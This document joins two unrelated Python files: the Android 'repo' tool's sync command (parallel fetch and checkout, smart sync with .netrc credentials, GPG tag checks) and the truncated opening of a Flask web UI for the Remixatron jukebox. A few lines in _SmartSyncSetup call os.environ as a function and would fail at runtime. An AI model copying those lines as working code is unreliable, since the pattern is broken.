# -*- coding:utf-8 -*- # # Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import json import netrc from optparse import SUPPRESS_HELP import os import re import socket import subprocess import sys import tempfile import time from pyversion import is_python3 if is_python3(): import http.cookiejar as cookielib import urllib.error import urllib.parse import urllib.request import xmlrpc.client else: import cookielib import imp import urllib2 import urlparse import xmlrpclib urllib = imp.new_module('urllib') urllib.error = urllib2 urllib.parse = urlparse urllib.request = urllib2 xmlrpc = imp.new_module('xmlrpc') xmlrpc.client = xmlrpclib try: import threading as _threading except ImportError: import dummy_threading as _threading try: import resource def _rlimit_nofile(): return resource.getrlimit(resource.RLIMIT_NOFILE) except ImportError: def _rlimit_nofile(): return (256, 256) try: import multiprocessing except ImportError: multiprocessing = None import event_log from git_command import GIT, git_require from git_config import GetUrlCookieFile from git_refs import R_HEADS, HEAD import gitc_utils from project import Project from project import RemoteSpec from command import Command, MirrorSafeCommand from error import RepoChangedException, GitError, ManifestParseError import platform_utils from project import SyncBuffer from progress import Progress from wrapper import Wrapper from manifest_xml import GitcManifest _ONE_DAY_S = 24 * 60 * 60 class _FetchError(Exception): """Internal error thrown in _FetchHelper() when we don't want stack trace.""" pass class _CheckoutError(Exception): """Internal error thrown in _CheckoutOne() when we don't want stack trace.""" class Sync(Command, MirrorSafeCommand): jobs = 1 common = True helpSummary = "Update working tree to the latest revision" helpUsage = """ %prog [<project>...] """ helpDescription = """ The '%prog' command synchronizes local project directories with the remote repositories specified in the manifest. If a local project does not yet exist, it will clone a new local directory from the remote repository and set up tracking branches as specified in the manifest. If the local project already exists, '%prog' will update the remote branches and rebase any new local changes on top of the new remote changes. '%prog' will synchronize all projects listed at the command line. Projects can be specified either by name, or by a relative or absolute path to the project's local directory. If no projects are specified, '%prog' will synchronize all projects listed in the manifest. The -d/--detach option can be used to switch specified projects back to the manifest revision. This option is especially helpful if the project is currently on a topic branch, but the manifest revision is temporarily needed. The -s/--smart-sync option can be used to sync to a known good build as specified by the manifest-server element in the current manifest. The -t/--smart-tag option is similar and allows you to specify a custom tag/label. The -u/--manifest-server-username and -p/--manifest-server-password options can be used to specify a username and password to authenticate with the manifest server when using the -s or -t option. If -u and -p are not specified when using the -s or -t option, '%prog' will attempt to read authentication credentials for the manifest server from the user's .netrc file. '%prog' will not use authentication credentials from -u/-p or .netrc if the manifest server specified in the manifest file already includes credentials. By default, all projects will be synced. The --fail-fast option can be used to halt syncing as soon as possible when the the first project fails to sync. The --force-sync option can be used to overwrite existing git directories if they have previously been linked to a different object direcotry. WARNING: This may cause data to be lost since refs may be removed when overwriting. The --force-remove-dirty option can be used to remove previously used projects with uncommitted changes. WARNING: This may cause data to be lost since uncommitted changes may be removed with projects that no longer exist in the manifest. The --no-clone-bundle option disables any attempt to use $URL/clone.bundle to bootstrap a new Git repository from a resumeable bundle file on a content delivery network. This may be necessary if there are problems with the local Python HTTP client or proxy configuration, but the Git binary works. The --fetch-submodules option enables fetching Git submodules of a project from server. The -c/--current-branch option can be used to only fetch objects that are on the branch specified by a project's revision. The --optimized-fetch option can be used to only fetch projects that are fixed to a sha1 revision if the sha1 revision does not already exist locally. The --prune option can be used to remove any refs that no longer exist on the remote. # SSH Connections If at least one project remote URL uses an SSH connection (ssh://, git+ssh://, or user@host:path syntax) repo will automatically enable the SSH ControlMaster option when connecting to that host. This feature permits other projects in the same '%prog' session to reuse the same SSH tunnel, saving connection setup overheads. To disable this behavior on UNIX platforms, set the GIT_SSH environment variable to 'ssh'. For example: export GIT_SSH=ssh %prog # Compatibility This feature is automatically disabled on Windows, due to the lack of UNIX domain socket support. This feature is not compatible with url.insteadof rewrites in the user's ~/.gitconfig. '%prog' is currently not able to perform the rewrite early enough to establish the ControlMaster tunnel. If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or later is required to fix a server side protocol bug. """ def _Options(self, p, show_smart=True): try: self.jobs = self.manifest.default.sync_j except ManifestParseError: self.jobs = 1 p.add_option('-f', '--force-broken', dest='force_broken', action='store_true', help='obsolete option (to be deleted in the future)') p.add_option('--fail-fast', dest='fail_fast', action='store_true', help='stop syncing after first error is hit') p.add_option('--force-sync', dest='force_sync', action='store_true', help="overwrite an existing git directory if it needs to " "point to a different object directory. WARNING: this " "may cause loss of data") p.add_option('--force-remove-dirty', dest='force_remove_dirty', action='store_true', help="force remove projects with uncommitted modifications if " "projects no longer exist in the manifest. " "WARNING: this may cause loss of data") p.add_option('-l', '--local-only', dest='local_only', action='store_true', help="only update working tree, don't fetch") p.add_option('--no-manifest-update', '--nmu', dest='mp_update', action='store_false', default='true', help='use the existing manifest checkout as-is. ' '(do not update to the latest revision)') p.add_option('-n', '--network-only', dest='network_only', action='store_true', help="fetch only, don't update working tree") p.add_option('-d', '--detach', dest='detach_head', action='store_true', help='detach projects back to manifest revision') p.add_option('-c', '--current-branch', dest='current_branch_only', action='store_true', help='fetch only current branch from server') p.add_option('-v', '--verbose', dest='output_mode', action='store_true', help='show all sync output') p.add_option('-q', '--quiet', dest='output_mode', action='store_false', help='only show errors') p.add_option('-j', '--jobs', dest='jobs', action='store', type='int', help="projects to fetch simultaneously (default %d)" % self.jobs) p.add_option('-m', '--manifest-name', dest='manifest_name', help='temporary manifest to use for this sync', metavar='NAME.xml') p.add_option('--no-clone-bundle', dest='clone_bundle', default=True, action='store_false', help='disable use of /clone.bundle on HTTP/HTTPS') p.add_option('-u', '--manifest-server-username', action='store', dest='manifest_server_username', help='username to authenticate with the manifest server') p.add_option('-p', '--manifest-server-password', action='store', dest='manifest_server_password', help='password to authenticate with the manifest server') p.add_option('--fetch-submodules', dest='fetch_submodules', action='store_true', help='fetch submodules from server') p.add_option('--no-tags', dest='tags', default=True, action='store_false', help="don't fetch tags") p.add_option('--optimized-fetch', dest='optimized_fetch', action='store_true', help='only fetch projects fixed to sha1 if revision does not exist locally') p.add_option('--prune', dest='prune', action='store_true', help='delete refs that no longer exist on the remote') if show_smart: p.add_option('-s', '--smart-sync', dest='smart_sync', action='store_true', help='smart sync using manifest from the latest known good build') p.add_option('-t', '--smart-tag', dest='smart_tag', action='store', help='smart sync using manifest from a known tag') g = p.add_option_group('repo Version options') g.add_option('--no-repo-verify', dest='repo_verify', default=True, action='store_false', help='do not verify repo source code') g.add_option('--repo-upgraded', dest='repo_upgraded', action='store_true', help=SUPPRESS_HELP) def _FetchProjectList(self, opt, projects, sem, *args, **kwargs): """Main function of the fetch threads. Delegates most of the work to _FetchHelper. Args: opt: Program options returned from optparse. See _Options(). projects: Projects to fetch. sem: We'll release() this semaphore when we exit so that another thread can be started up. *args, **kwargs: Remaining arguments to pass to _FetchHelper. See the _FetchHelper docstring for details. """ try: for project in projects: success = self._FetchHelper(opt, project, *args, **kwargs) if not success and opt.fail_fast: break finally: sem.release() def _FetchHelper(self, opt, project, lock, fetched, pm, err_event, clone_filter): """Fetch git objects for a single project. Args: opt: Program options returned from optparse. See _Options(). project: Project object for the project to fetch. lock: Lock for accessing objects that are shared amongst multiple _FetchHelper() threads. fetched: set object that we will add project.gitdir to when we're done (with our lock held). pm: Instance of a Project object. We will call pm.update() (with our lock held). err_event: We'll set this event in the case of an error (after printing out info about the error). clone_filter: Filter for use in a partial clone. Returns: Whether the fetch was successful. """ # We'll set to true once we've locked the lock. did_lock = False # Encapsulate everything in a try/except/finally so that: # - We always set err_event in the case of an exception. # - We always make sure we unlock the lock if we locked it. start = time.time() success = False try: try: success = project.Sync_NetworkHalf( quiet=opt.quiet, verbose=opt.verbose, current_branch_only=opt.current_branch_only, force_sync=opt.force_sync, clone_bundle=opt.clone_bundle, tags=opt.tags, archive=self.manifest.IsArchive, optimized_fetch=opt.optimized_fetch, prune=opt.prune, clone_filter=clone_filter) self._fetch_times.Set(project, time.time() - start) # Lock around all the rest of the code, since printing, updating a set # and Progress.update() are not thread safe. lock.acquire() did_lock = True if not success: err_event.set() print('error: Cannot fetch %s from %s' % (project.name, project.remote.url), file=sys.stderr) if opt.fail_fast: raise _FetchError() fetched.add(project.gitdir) pm.update(msg=project.name) except _FetchError: pass except Exception as e: print('error: Cannot fetch %s (%s: %s)' % (project.name, type(e).__name__, str(e)), file=sys.stderr) err_event.set() raise finally: if did_lock: lock.release() finish = time.time() self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK, start, finish, success) return success def _Fetch(self, projects, opt, err_event): fetched = set() lock = _threading.Lock() pm = Progress('Fetching projects', len(projects), always_print_percentage=opt.quiet) objdir_project_map = dict() for project in projects: objdir_project_map.setdefault(project.objdir, []).append(project) threads = set() sem = _threading.Semaphore(self.jobs) for project_list in objdir_project_map.values(): # Check for any errors before running any more tasks. # ...we'll let existing threads finish, though. if err_event.isSet() and opt.fail_fast: break sem.acquire() kwargs = dict(opt=opt, projects=project_list, sem=sem, lock=lock, fetched=fetched, pm=pm, err_event=err_event, clone_filter=self.manifest.CloneFilter) if self.jobs > 1: t = _threading.Thread(target=self._FetchProjectList, kwargs=kwargs) # Ensure that Ctrl-C will not freeze the repo process. t.daemon = True threads.add(t) t.start() else: self._FetchProjectList(**kwargs) for t in threads: t.join() pm.end() self._fetch_times.Save() if not self.manifest.IsArchive: self._GCProjects(projects, opt, err_event) return fetched def _CheckoutWorker(self, opt, sem, project, *args, **kwargs): """Main function of the fetch threads. Delegates most of the work to _CheckoutOne. Args: opt: Program options returned from optparse. See _Options(). projects: Projects to fetch. sem: We'll release() this semaphore when we exit so that another thread can be started up. *args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the _CheckoutOne docstring for details. """ try: return self._CheckoutOne(opt, project, *args, **kwargs) finally: sem.release() def _CheckoutOne(self, opt, project, lock, pm, err_event, err_results): """Checkout work tree for one project Args: opt: Program options returned from optparse. See _Options(). project: Project object for the project to checkout. lock: Lock for accessing objects that are shared amongst multiple _CheckoutWorker() threads. pm: Instance of a Project object. We will call pm.update() (with our lock held). err_event: We'll set this event in the case of an error (after printing out info about the error). err_results: A list of strings, paths to git repos where checkout failed. Returns: Whether the fetch was successful. """ # We'll set to true once we've locked the lock. did_lock = False # Encapsulate everything in a try/except/finally so that: # - We always set err_event in the case of an exception. # - We always make sure we unlock the lock if we locked it. start = time.time() syncbuf = SyncBuffer(self.manifest.manifestProject.config, detach_head=opt.detach_head) success = False try: try: project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync) # Lock around all the rest of the code, since printing, updating a set # and Progress.update() are not thread safe. lock.acquire() success = syncbuf.Finish() did_lock = True if not success: err_event.set() print('error: Cannot checkout %s' % (project.name), file=sys.stderr) raise _CheckoutError() pm.update(msg=project.name) except _CheckoutError: pass except Exception as e: print('error: Cannot checkout %s: %s: %s' % (project.name, type(e).__name__, str(e)), file=sys.stderr) err_event.set() raise finally: if did_lock: if not success: err_results.append(project.relpath) lock.release() finish = time.time() self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL, start, finish, success) return success def _Checkout(self, all_projects, opt, err_event, err_results): """Checkout projects listed in all_projects Args: all_projects: List of all projects that should be checked out. opt: Program options returned from optparse. See _Options(). err_event: We'll set this event in the case of an error (after printing out info about the error). err_results: A list of strings, paths to git repos where checkout failed. """ # Perform checkouts in multiple threads when we are using partial clone. # Without partial clone, all needed git objects are already downloaded, # in this situation it's better to use only one process because the checkout # would be mostly disk I/O; with partial clone, the objects are only # downloaded when demanded (at checkout time), which is similar to the # Sync_NetworkHalf case and parallelism would be helpful. if self.manifest.CloneFilter: syncjobs = self.jobs else: syncjobs = 1 lock = _threading.Lock() pm = Progress('Checking out projects', len(all_projects)) threads = set() sem = _threading.Semaphore(syncjobs) for project in all_projects: # Check for any errors before running any more tasks. # ...we'll let existing threads finish, though. if err_event.isSet() and opt.fail_fast: break sem.acquire() if project.worktree: kwargs = dict(opt=opt, sem=sem, project=project, lock=lock, pm=pm, err_event=err_event, err_results=err_results) if syncjobs > 1: t = _threading.Thread(target=self._CheckoutWorker, kwargs=kwargs) # Ensure that Ctrl-C will not freeze the repo process. t.daemon = True threads.add(t) t.start() else: self._CheckoutWorker(**kwargs) for t in threads: t.join() pm.end() def _GCProjects(self, projects, opt, err_event): gc_gitdirs = {} for project in projects: # Make sure pruning never kicks in with shared projects. if (not project.use_git_worktrees and len(project.manifest.GetProjectsWithName(project.name)) > 1): print('%s: Shared project %s found, disabling pruning.' % (project.relpath, project.name)) if git_require((2, 7, 0)): project.EnableRepositoryExtension('preciousObjects') else: # This isn't perfect, but it's the best we can do with old git. print('%s: WARNING: shared projects are unreliable when using old ' 'versions of git; please upgrade to git-2.7.0+.' % (project.relpath,), file=sys.stderr) project.config.SetString('gc.pruneExpire', 'never') gc_gitdirs[project.gitdir] = project.bare_git if multiprocessing: cpu_count = multiprocessing.cpu_count() else: cpu_count = 1 jobs = min(self.jobs, cpu_count) if jobs < 2: for bare_git in gc_gitdirs.values(): bare_git.gc('--auto') return config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1} threads = set() sem = _threading.Semaphore(jobs) def GC(bare_git): try: try: bare_git.gc('--auto', config=config) except GitError: err_event.set() except Exception: err_event.set() raise finally: sem.release() for bare_git in gc_gitdirs.values(): if err_event.isSet() and opt.fail_fast: break sem.acquire() t = _threading.Thread(target=GC, args=(bare_git,)) t.daemon = True threads.add(t) t.start() for t in threads: t.join() def _ReloadManifest(self, manifest_name=None): if manifest_name: # Override calls _Unload already self.manifest.Override(manifest_name) else: self.manifest._Unload() def UpdateProjectList(self, opt): new_project_paths = [] for project in self.GetProjects(None, missing_ok=True): if project.relpath: new_project_paths.append(project.relpath) file_name = 'project.list' file_path = os.path.join(self.manifest.repodir, file_name) old_project_paths = [] if os.path.exists(file_path): with open(file_path, 'r') as fd: old_project_paths = fd.read().split('\n') # In reversed order, so subfolders are deleted before parent folder. for path in sorted(old_project_paths, reverse=True): if not path: continue if path not in new_project_paths: # If the path has already been deleted, we don't need to do it gitdir = os.path.join(self.manifest.topdir, path, '.git') if os.path.exists(gitdir): project = Project( manifest=self.manifest, name=path, remote=RemoteSpec('origin'), gitdir=gitdir, objdir=gitdir, use_git_worktrees=os.path.isfile(gitdir), worktree=os.path.join(self.manifest.topdir, path), relpath=path, revisionExpr='HEAD', revisionId=None, groups=None) if not project.DeleteWorktree( quiet=opt.quiet, force=opt.force_remove_dirty): return 1 new_project_paths.sort() with open(file_path, 'w') as fd: fd.write('\n'.join(new_project_paths)) fd.write('\n') return 0 def _SmartSyncSetup(self, opt, smart_sync_manifest_path): if not self.manifest.manifest_server: print('error: cannot smart sync: no manifest server defined in ' 'manifest', file=sys.stderr) sys.exit(1) manifest_server = self.manifest.manifest_server if not opt.quiet: print('Using manifest server %s' % manifest_server) if '@' not in manifest_server: username = None password = None if opt.manifest_server_username and opt.manifest_server_password: username = opt.manifest_server_username password = opt.manifest_server_password else: try: info = netrc.netrc() except IOError: # .netrc file does not exist or could not be opened pass else: try: parse_result = urllib.parse.urlparse(manifest_server) if parse_result.hostname: auth = info.authenticators(parse_result.hostname) if auth: username, _account, password = auth else: print('No credentials found for %s in .netrc' % parse_result.hostname, file=sys.stderr) except netrc.NetrcParseError as e: print('Error parsing .netrc file: %s' % e, file=sys.stderr) if (username and password): manifest_server = manifest_server.replace('://', '://%s:%s@' % (username, password), 1) transport = PersistentTransport(manifest_server) if manifest_server.startswith('persistent-'): manifest_server = manifest_server[len('persistent-'):] try: server = xmlrpc.client.Server(manifest_server, transport=transport) if opt.smart_sync: p = self.manifest.manifestProject b = p.GetBranch(p.CurrentBranch) branch = b.merge if branch.startswith(R_HEADS): branch = branch[len(R_HEADS):] if 'SYNC_TARGET' in os.environ: target = os.environ('SYNC_TARGET') [success, manifest_str] = server.GetApprovedManifest(branch, target) elif ('TARGET_PRODUCT' in os.environ and 'TARGET_BUILD_VARIANT' in os.environ): target = '%s-%s' % (os.environ('TARGET_PRODUCT'), os.environ('TARGET_BUILD_VARIANT')) [success, manifest_str] = server.GetApprovedManifest(branch, target) else: [success, manifest_str] = server.GetApprovedManifest(branch) else: assert(opt.smart_tag) [success, manifest_str] = server.GetManifest(opt.smart_tag) if success: manifest_name = os.path.basename(smart_sync_manifest_path) try: with open(smart_sync_manifest_path, 'w') as f: f.write(manifest_str) except IOError as e: print('error: cannot write manifest to %s:\n%s' % (smart_sync_manifest_path, e), file=sys.stderr) sys.exit(1) self._ReloadManifest(manifest_name) else: print('error: manifest server RPC call failed: %s' % manifest_str, file=sys.stderr) sys.exit(1) except (socket.error, IOError, xmlrpc.client.Fault) as e: print('error: cannot connect to manifest server %s:\n%s' % (self.manifest.manifest_server, e), file=sys.stderr) sys.exit(1) except xmlrpc.client.ProtocolError as e: print('error: cannot connect to manifest server %s:\n%d %s' % (self.manifest.manifest_server, e.errcode, e.errmsg), file=sys.stderr) sys.exit(1) return manifest_name def _UpdateManifestProject(self, opt, mp, manifest_name): """Fetch & update the local manifest project.""" if not opt.local_only: start = time.time() success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose, current_branch_only=opt.current_branch_only, tags=opt.tags, optimized_fetch=opt.optimized_fetch, submodules=self.manifest.HasSubmodules, clone_filter=self.manifest.CloneFilter) finish = time.time() self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK, start, finish, success) if mp.HasChanges: syncbuf = SyncBuffer(mp.config) start = time.time() mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules) clean = syncbuf.Finish() self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL, start, time.time(), clean) if not clean: sys.exit(1) self._ReloadManifest(opt.manifest_name) if opt.jobs is None: self.jobs = self.manifest.default.sync_j def ValidateOptions(self, opt, args): if opt.force_broken: print('warning: -f/--force-broken is now the default behavior, and the ' 'options are deprecated', file=sys.stderr) if opt.network_only and opt.detach_head: self.OptionParser.error('cannot combine -n and -d') if opt.network_only and opt.local_only: self.OptionParser.error('cannot combine -n and -l') if opt.manifest_name and opt.smart_sync: self.OptionParser.error('cannot combine -m and -s') if opt.manifest_name and opt.smart_tag: self.OptionParser.error('cannot combine -m and -t') if opt.manifest_server_username or opt.manifest_server_password: if not (opt.smart_sync or opt.smart_tag): self.OptionParser.error('-u and -p may only be combined with -s or -t') if None in [opt.manifest_server_username, opt.manifest_server_password]: self.OptionParser.error('both -u and -p must be given') def Execute(self, opt, args): if opt.jobs: self.jobs = opt.jobs if self.jobs > 1: soft_limit, _ = _rlimit_nofile() self.jobs = min(self.jobs, (soft_limit - 5) // 3) opt.quiet = opt.output_mode is False opt.verbose = opt.output_mode is True if opt.manifest_name: self.manifest.Override(opt.manifest_name) manifest_name = opt.manifest_name smart_sync_manifest_path = os.path.join( self.manifest.manifestProject.worktree, 'smart_sync_override.xml') if opt.smart_sync or opt.smart_tag: manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path) else: if os.path.isfile(smart_sync_manifest_path): try: platform_utils.remove(smart_sync_manifest_path) except OSError as e: print('error: failed to remove existing smart sync override manifest: %s' % e, file=sys.stderr) err_event = _threading.Event() rp = self.manifest.repoProject rp.PreSync() mp = self.manifest.manifestProject mp.PreSync() if opt.repo_upgraded: _PostRepoUpgrade(self.manifest, quiet=opt.quiet) if not opt.mp_update: print('Skipping update of local manifest project.') else: self._UpdateManifestProject(opt, mp, manifest_name) if self.gitc_manifest: gitc_manifest_projects = self.GetProjects(args, missing_ok=True) gitc_projects = [] opened_projects = [] for project in gitc_manifest_projects: if project.relpath in self.gitc_manifest.paths and \ self.gitc_manifest.paths[project.relpath].old_revision: opened_projects.append(project.relpath) else: gitc_projects.append(project.relpath) if not args: gitc_projects = None if gitc_projects != [] and not opt.local_only: print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name) manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name) if manifest_name: manifest.Override(manifest_name) else: manifest.Override(self.manifest.manifestFile) gitc_utils.generate_gitc_manifest(self.gitc_manifest, manifest, gitc_projects) print('GITC client successfully synced.') # The opened projects need to be synced as normal, therefore we # generate a new args list to represent the opened projects. # TODO: make this more reliable -- if there's a project name/path overlap, # this may choose the wrong project. args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd()) for path in opened_projects] if not args: return all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=opt.fetch_submodules) err_network_sync = False err_update_projects = False err_checkout = False self._fetch_times = _FetchTimes(self.manifest) if not opt.local_only: to_fetch = [] now = time.time() if _ONE_DAY_S <= (now - rp.LastFetch): to_fetch.append(rp) to_fetch.extend(all_projects) to_fetch.sort(key=self._fetch_times.Get, reverse=True) fetched = self._Fetch(to_fetch, opt, err_event) _PostRepoFetch(rp, opt.repo_verify) if opt.network_only: # bail out now; the rest touches the working tree if err_event.isSet(): print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr) sys.exit(1) return # Iteratively fetch missing and/or nested unregistered submodules previously_missing_set = set() while True: self._ReloadManifest(manifest_name) all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=opt.fetch_submodules) missing = [] for project in all_projects: if project.gitdir not in fetched: missing.append(project) if not missing: break # Stop us from non-stopped fetching actually-missing repos: If set of # missing repos has not been changed from last fetch, we break. missing_set = set(p.name for p in missing) if previously_missing_set == missing_set: break previously_missing_set = missing_set fetched.update(self._Fetch(missing, opt, err_event)) # If we saw an error, exit with code 1 so that other scripts can check. if err_event.isSet(): err_network_sync = True if opt.fail_fast: print('\nerror: Exited sync due to fetch errors.\n' 'Local checkouts *not* updated. Resolve network issues & ' 'retry.\n' '`repo sync -l` will update some local checkouts.', file=sys.stderr) sys.exit(1) if self.manifest.IsMirror or self.manifest.IsArchive: # bail out now, we have no working tree return if self.UpdateProjectList(opt): err_event.set() err_update_projects = True if opt.fail_fast: print('\nerror: Local checkouts *not* updated.', file=sys.stderr) sys.exit(1) err_results = [] self._Checkout(all_projects, opt, err_event, err_results) if err_event.isSet(): err_checkout = True # NB: We don't exit here because this is the last step. # If there's a notice that's supposed to print at the end of the sync, print # it now... if self.manifest.notice: print(self.manifest.notice) # If we saw an error, exit with code 1 so that other scripts can check. if err_event.isSet(): print('\nerror: Unable to fully sync the tree.', file=sys.stderr) if err_network_sync: print('error: Downloading network changes failed.', file=sys.stderr) if err_update_projects: print('error: Updating local project lists failed.', file=sys.stderr) if err_checkout: print('error: Checking out local projects failed.', file=sys.stderr) if err_results: print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr) print('Try re-running with "-j1 --fail-fast" to exit at the first error.', file=sys.stderr) sys.exit(1) if not opt.quiet: print('repo sync has finished successfully.') def _PostRepoUpgrade(manifest, quiet=False): wrapper = Wrapper() if wrapper.NeedSetupGnuPG(): wrapper.SetupGnuPG(quiet) for project in manifest.projects: if project.Exists: project.PostRepoUpgrade() def _PostRepoFetch(rp, repo_verify=True, verbose=False): if rp.HasChanges: print('info: A new version of repo is available', file=sys.stderr) print(file=sys.stderr) if not repo_verify or _VerifyTag(rp): syncbuf = SyncBuffer(rp.config) rp.Sync_LocalHalf(syncbuf) if not syncbuf.Finish(): sys.exit(1) print('info: Restarting repo with latest version', file=sys.stderr) raise RepoChangedException(['--repo-upgraded']) else: print('warning: Skipped upgrade to unverified version', file=sys.stderr) else: if verbose: print('repo version %s is current' % rp.work_git.describe(HEAD), file=sys.stderr) def _VerifyTag(project): gpg_dir = os.path.expanduser('~/.repoconfig/gnupg') if not os.path.exists(gpg_dir): print('warning: GnuPG was not available during last "repo init"\n' 'warning: Cannot automatically authenticate repo."""', file=sys.stderr) return True try: cur = project.bare_git.describe(project.GetRevisionId()) except GitError: cur = None if not cur \ or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur): rev = project.revisionExpr if rev.startswith(R_HEADS): rev = rev[len(R_HEADS):] print(file=sys.stderr) print("warning: project '%s' branch '%s' is not signed" % (project.name, rev), file=sys.stderr) return False env = os.environ.copy() env['GIT_DIR'] = project.gitdir env['GNUPGHOME'] = gpg_dir cmd = [GIT, 'tag', '-v', cur] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out = proc.stdout.read() proc.stdout.close() err = proc.stderr.read() proc.stderr.close() if proc.wait() != 0: print(file=sys.stderr) print(out, file=sys.stderr) print(err, file=sys.stderr) print(file=sys.stderr) return False return True class _FetchTimes(object): _ALPHA = 0.5 def __init__(self, manifest): self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json') self._times = None self._seen = set() def Get(self, project): self._Load() return self._times.get(project.name, _ONE_DAY_S) def Set(self, project, t): self._Load() name = project.name old = self._times.get(name, t) self._seen.add(name) a = self._ALPHA self._times[name] = (a * t) + ((1 - a) * old) def _Load(self): if self._times is None: try: with open(self._path) as f: self._times = json.load(f) except (IOError, ValueError): try: platform_utils.remove(self._path) except OSError: pass self._times = {} def Save(self): if self._times is None: return to_delete = [] for name in self._times: if name not in self._seen: to_delete.append(name) for name in to_delete: del self._times[name] try: with open(self._path, 'w') as f: json.dump(self._times, f, indent=2) except (IOError, TypeError): try: platform_utils.remove(self._path) except OSError: pass # This is a replacement for xmlrpc.client.Transport using urllib2 # and supporting persistent-http[s]. It cannot change hosts from # request to request like the normal transport, the real url # is passed during initialization. class PersistentTransport(xmlrpc.client.Transport): def __init__(self, orig_host): self.orig_host = orig_host def request(self, host, handler, request_body, verbose=False): with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy): # Python doesn't understand cookies with the #HttpOnly_ prefix # Since we're only using them for HTTP, copy the file temporarily, # stripping those prefixes away. if cookiefile: tmpcookiefile = tempfile.NamedTemporaryFile(mode='w') tmpcookiefile.write("# HTTP Cookie File") try: with open(cookiefile) as f: for line in f: if line.startswith("#HttpOnly_"): line = line[len("#HttpOnly_"):] tmpcookiefile.write(line) tmpcookiefile.flush() cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name) try: cookiejar.load() except cookielib.LoadError: cookiejar = cookielib.CookieJar() finally: tmpcookiefile.close() else: cookiejar = cookielib.CookieJar() proxyhandler = urllib.request.ProxyHandler if proxy: proxyhandler = urllib.request.ProxyHandler({ "http": proxy, "https": proxy}) opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cookiejar), proxyhandler) url = urllib.parse.urljoin(self.orig_host, handler) parse_results = urllib.parse.urlparse(url) scheme = parse_results.scheme if scheme == 'persistent-http': scheme = 'http' if scheme == 'persistent-https': # If we're proxying through persistent-https, use http. The # proxy itself will do the https. if proxy: scheme = 'http' else: scheme = 'https' # Parse out any authentication information using the base class host, extra_headers, _ = self.get_host_info(parse_results.netloc) url = urllib.parse.urlunparse(( scheme, host, parse_results.path, parse_results.params, parse_results.query, parse_results.fragment)) request = urllib.request.Request(url, request_body) if extra_headers is not None: for (name, header) in extra_headers: request.add_header(name, header) request.add_header('Content-Type', 'text/xml') try: response = opener.open(request) except urllib.error.HTTPError as e: if e.code == 501: # We may have been redirected through a login process # but our POST turned into a GET. Retry. response = opener.open(request) else: raise p, u = xmlrpc.client.getparser() while 1: data = response.read(1024) if not data: break p.feed(data) p.close() return u.close() def close(self): pass
main.py
""" Remixatron Web UI (c) 2019 - Dave Rensin - [email protected] This is a web ui for the Remixatron Infinite Jukebox project. (https://github.com/drensin/Remixatron) The original project was a CLI that used curses, but that caused problems on Windows and other systems. So, I wrote thsi UI to be a bit more friendly. See the README.MD file in this project for information about how to install, configure, and run this. """ import bz2 import collections import glob import json import numpy as np import os import requests import secrets import subprocess import soundfile as sf import sys import urllib.parse import tempfile from flask import Flask, current_app, g, make_response, redirect, request, send_from_directory, session, url_for from flask_compress import Compress from flask_socketio import SocketIO, emit, send from multiprocessing import Process from Remixatron import InfiniteJukebox # supress warnings from any of the imported libraries. This will keep the # console clean. if not sys.warnoptions: import warnings warnings.simplefilter("ignore") app = Flask(__name__) # make sure that any files we send expire really quickly so caching # doesn't screw up playback app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1 # turn on gzip compression for all responses compress = Compress(app) socketio = None # the cors.cfg file defines which domains will be trusted for connections. The # default entry of localhost:8000 will be fine if you are running the web # browser on the same host as this server. Otherwise, you'll have to modify # accordingly. See the README.MD for this project for more info. if os.path.isfile('cors.cfg'): with open('cors.cfg') as cors_file: origins = json.load(cors_file) socketio = SocketIO(app, cors_allowed_origins = origins['ORIGINS']) else: socketio = SocketIO(app) # this will hold the 50 most recent messages for each client messageQueues = {} # this will hold the Process object current being used for audio processing # for each client. No client should have more than one process working at a # time procMap = {} def get_userid(): """ Returns the device id of the connected user form their cookies. Returns: string: the device id stored in the browser cookie """ return request.cookies.get('deviceid') def redirect_https(dir, path): """If this server sits behind a proxy like gunicorn or nginix, then this function will figure that out and re-write the redirect headers accordingly. Args: dir (string): the local directory for the item to return path (string): the file name for the item to return Returns: flask.Response: a Flask Response object """ # Grab the device id. If it hasn't already been set, then create one and set it deviceid = get_userid() if deviceid == None: deviceid = secrets.token_urlsafe(16) # if this server is behind a proxy like ngnix or gunicorn, then we should detect that and # re-write the redirect URL to work correctly. if 'X-Forwarded-Proto' in request.headers and request.headers['X-Forwarded-Proto'] == 'https': url = 'https://' + request.host + url_for(dir, filename=path) resp = redirect(url) resp.set_cookie('deviceid',deviceid, max_age=31536000) resp.headers.add('Cache-Control', 'no-store') return resp # otherwise, just set the device id and redirect as required resp = redirect(url_for(dir, filename=path)) resp.set_cookie('deviceid',deviceid, max_age=31536000) resp.headers.add('Cache-Control', 'no-store') return resp @socketio.on_error_default def 